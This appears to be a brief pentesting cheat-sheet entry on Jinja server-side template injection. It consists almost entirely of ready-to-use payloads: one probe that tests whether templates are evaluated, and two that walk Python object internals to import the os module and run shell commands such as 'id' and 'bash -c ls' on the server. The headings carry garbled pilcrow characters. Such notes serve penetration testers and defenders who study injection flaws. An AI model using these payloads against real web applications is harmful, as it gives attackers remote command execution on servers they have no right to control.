Jinja SSTIΒΆ

SSTI => Server Side Template Injection

jinja render 7777777 with this payload:
{{7*'7'}}
Execute bash command with os module :
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("bash -c 'ls'").read()}}{%endif%}{%endfor%}
other example:
{{request.application.__globals__.__builtins__.__import__('os').popen("id").read()}}

ToolΒΆ